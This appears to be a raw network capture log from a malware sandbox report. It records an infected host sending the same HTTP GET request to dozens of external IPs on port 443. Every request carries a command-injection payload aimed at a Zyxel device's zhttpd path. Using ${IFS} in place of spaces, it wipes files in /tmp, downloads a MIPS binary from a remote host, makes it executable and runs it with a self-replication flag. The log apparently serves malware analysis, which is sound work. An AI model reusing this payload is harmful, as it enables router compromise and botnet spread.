                                                        Jan 28, 2024 10:12:49.340459108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3655192.168.2.1455528170.170.152.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340504885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3656192.168.2.1442554153.106.161.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340529919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3657192.168.2.1444380113.178.225.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340557098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3658192.168.2.1458632183.74.228.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340583086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3659192.168.2.14522764.193.88.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340626955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3660192.168.2.144013437.86.101.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340655088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3661192.168.2.144525665.46.29.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340675116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3662192.168.2.143643842.100.66.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340729952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3663192.168.2.1443200216.118.228.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340780020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3664192.168.2.143354837.8.135.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340816975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3665192.168.2.144146040.55.143.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340852022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3666192.168.2.143962498.210.44.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340882063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3667192.168.2.1458058219.103.195.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340909004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3668192.168.2.1455566146.65.238.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340944052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3669192.168.2.1434736186.68.72.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.340981960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3670192.168.2.143863846.3.245.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341016054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3671192.168.2.1435302210.133.20.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341062069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3672192.168.2.1450774107.135.1.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341109991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3673192.168.2.1438230166.83.102.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341144085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3674192.168.2.1443200200.48.38.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341200113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3675192.168.2.1442034106.146.105.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.341226101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3676192.168.2.1437774125.191.111.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356183052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3677192.168.2.143948682.191.4.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356259108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3678192.168.2.1451930173.128.45.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356336117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3679192.168.2.14563165.177.16.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356370926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3680192.168.2.1437604193.130.32.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356401920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3681192.168.2.1451708204.123.164.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356447935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3682192.168.2.1450962195.80.123.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356481075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3683192.168.2.1449936157.94.233.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356580019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3684192.168.2.145615262.87.0.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356580973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3685192.168.2.145798498.209.56.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356580973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3686192.168.2.145163089.202.139.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356600046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3687192.168.2.1450938172.13.125.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356652975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3688192.168.2.1451012148.99.184.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356679916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3689192.168.2.1438466166.192.53.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356713057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3690192.168.2.1432804166.118.233.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356749058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3691192.168.2.144726817.209.235.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356805086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3692192.168.2.1452604180.220.69.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356849909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3693192.168.2.143763497.118.228.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356880903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3694192.168.2.1446328144.93.132.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356885910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3695192.168.2.145621279.109.184.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356904030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3696192.168.2.1456476204.65.97.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356977940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3697192.168.2.1460014114.6.194.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.356997013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3698192.168.2.146031289.242.34.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357002020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3699192.168.2.1433938191.186.233.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357044935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3700192.168.2.144817441.232.201.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357095003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3701192.168.2.1448932184.111.72.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357125998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3702192.168.2.1450726115.141.108.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357155085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3703192.168.2.1440556102.27.22.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357203960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3704192.168.2.144150842.128.85.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357238054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3705192.168.2.1436394202.62.18.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357250929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3706192.168.2.1452508148.131.16.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357321024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3707192.168.2.144604290.157.64.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357352018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3708192.168.2.144732669.67.114.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357410908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3709192.168.2.144631451.77.27.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357425928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3710192.168.2.1457692202.252.50.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357445955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3711192.168.2.143738424.109.113.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357506037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3712192.168.2.1441748152.167.102.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357528925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3713192.168.2.144884251.15.159.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357569933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3714192.168.2.1455922141.191.85.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357585907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3715192.168.2.14543844.124.84.34443
                                                        TimestampBytes transferredDirectionData
